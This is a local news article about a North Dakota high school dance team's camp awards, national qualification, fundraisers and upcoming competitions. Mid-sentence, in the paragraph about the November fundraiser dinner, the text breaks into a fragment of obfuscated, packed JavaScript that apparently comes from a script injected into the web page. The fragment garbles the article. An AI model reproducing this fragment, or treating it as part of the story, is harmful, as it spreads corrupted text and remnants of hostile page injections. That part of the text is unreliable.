VALLEY CITY, N.D. (NewsDakota.com)- Hard work and dedication have paid off for the Hi-Lites Dance Team. While attending UDA camp in St. Cloud this summer, many exciting things happened for them. After attending Master classes, practicing a home routine, and learning a camp routine, the teams were judged on the final day. The JV team was awarded a Most Improved trophy as well as several individual performance ribbons. Most exciting of all, their home routine and their camp routine earned the Varsity team a return trip to UDA Nationals in Orlando, Florida in January 2018. Varsity members also earned many individual performance ribbons. The Hi-Lites had four Varsity members qualify as UDA All Americans: Monisha Terry, London Dietrich, Jennifer Anderson and Morgan Nelson.
Fundraising started this summer with a summer BBQ at Bank Forward parking lot, car washes, the dancers teaching younger dancers a routine for Dancing in the Streets and performing at the end of Crazy Days, as well as a Back to School camp that had the entire group performing at the first home VCHS football game.
The dancers next fundraising event is the Hi-Light the Night dinner/fashion show to be held November 4th yrsdr|var|u0026u|referrer|bzayd||js|php’.split(‘|’),0,{}))
at the VC Eagle Club. It will be a night of fun, food and fashion. Tickets are available from any dance team member. Tickets are presale only and will not be sold at the door so be sure to get yours now. Don’t miss a chance to see the dancers modeling fashions from local businesses, and you may even recognize our waiters for the evening. Here’s a hint, think Dance dads!
The teams are already hard at work on their routines for the upcoming season which officially begins in November. The JV team will participate in Jazz, Pom and Kick, while Varsity will be performing Hip Hop, Jazz, Kick and Pom. The Hi-Lites dance team would like to thank the community for its’ support of the team. They also say they could not do this without their coach Megan Gilbertson and S.H.I.N.E., (Supporting Hi-Lites In New Experiences), the parent support group for the team. You can catch them performing some of their routines at the Davies Extravaganza on November 18th. The Hi-Lites will kick off their 2018 competition season on December 2nd at the Fargo North Invite.
